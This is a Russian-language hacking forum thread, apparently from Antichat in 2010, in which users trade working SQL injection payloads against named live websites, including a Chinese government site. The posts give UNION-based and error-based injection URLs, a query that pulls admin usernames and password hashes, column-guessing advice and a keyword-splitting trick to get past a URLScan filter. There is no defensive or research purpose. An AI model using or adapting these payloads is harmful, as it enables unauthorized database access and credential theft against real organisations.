01.04.2010, 01:21
|
|
Banned
Регистрация: 14.06.2008
Сообщений: 34
С нами:
9424793
Репутация:
13
|
|
http://www.4ips.biz/products.php?id=71+union+select+1,2,3,4%20--
через order by получается что 4 колонки но подставляя пишет что не верное кол-во, пробывал менять лимит - бесполезно
и ещё: чем можно заменить знак кавычки кроме как через hex?
|
|
|
01.04.2010, 02:12
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами:
9000386
Репутация:
1148
|
|
Сообщение от Darren
и ещё: чем можно заменить знак кавычки кроме как через hex?
CHAR
|
|
|
|
01.04.2010, 01:57
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Код:
http://www.4ips.biz/products.php?id=(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+pics_db+group+by+2+limit+1)a)
|
|
|
|
01.04.2010, 02:22
|
|
Banned
Регистрация: 14.06.2008
Сообщений: 34
С нами:
9424793
Репутация:
13
|
|
Pashkela а как ты узнал о существовании таблицы pics_db, брут?
и как через такую ошибку, зная название таблицы можно узнать название столбцов?
http://www.4ips.biz/products.php?id=(select+1+from+(select+count(0),co ncat((select+pic s_db.*),floor(rand(0)*2))+from+pic s_db+group+by+2+limit+1)a)
?
|
|
|
|
01.04.2010, 02:30
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами:
9000386
Репутация:
1148
|
|
Сообщение от Darren
Pashkela а как ты узнал о существовании таблицы pics_db, брут?
Можна не знать названия таблицы и какую нить ин-ию вытащить ис переменных и функций!
Код:
_http://www.4ips.biz/products.php?id=(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+(select+1+union+select+2+union+select+3)x+group+by+2+limit+1)a)
Есть admin_db, но там скорее одна запись || пустая -> ошибку не выплевывает!
Вот еще путь выдрал, если надо!
Код HTML:
Unable to save result set in /hsphere/local/home/sitang/4ips.biz/products.php on line 57
Последний раз редактировалось Strilo4ka; 01.04.2010 в 03:23..
|
|
|
|
01.04.2010, 02:29
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Pashkela а как ты узнал о существовании таблицы pics_db, брут?
нет:
Код:
http://www.4ips.biz/products.php?id=71+or+1=1+union+select+1,2,3,4+limit+0,1
to use near 'ORDER BY pics_db.pics_id DESC'
а названия столбцов только брутить (как и остальных таблиц), кроме столбца pics_id:
Код:
http://www.4ips.biz/products.php?id=(select+1+from+(select+count(0),concat((select+pics_id+from+pics_db+limit+0,1),floor(rand(0)*2))+from+pics_db+group+by+2+limit+0,1)a)
|
|
|
|
01.04.2010, 03:21
|
|
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
С нами:
8603287
Репутация:
87
|
|
у мну вот такая проблема.. есть уязвимость MSSQL..
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark after the character string ''.
/products.asp, line 22
и стоит защита типа на SELECT,VERSION,TABLE идт..
с SELECT все испробовал идет тока ('sel'+'ect')
как дальше я хД
всевремя перекидует на www.site.ru/Rejected-By-UrlScan/?~/products.asp?cat=select
з.ы (('sel'+'ect')+top+1+???+FROM+INFORMATION _SCHEMA.????) |
|
|
|
01.04.2010, 13:23
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
С нами:
10339586
Репутация:
1396
|
|
|
|
|
|
01.04.2010, 13:35
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от $n@ke
2 попугай
используют это http://www.codenet.ru/webmast/iis/htm/core/iiacnsc.php#NTFSpermissions
|
|
|
|
01.04.2010, 17:44
|
|
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
С нами:
9610572
Репутация:
32
|
|
Есть такая скуль
__http://www.ykjw.gov.cn/newsinfo.php?id=-214+union+select+1,group_concat(concat(uid,0x3a,pw d)),3,4,5,6+from+administrator
никак не могу админку найти
доступ к mysql.user закрыт и file_priv=NO
как тут можно выкрутиться?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
|
|
|
|
![Аватар для [Feldmarschall]](/avatars/avatar109813.jpg?2032632){kind=avatar}
Похожие темы
Комбинированный вид
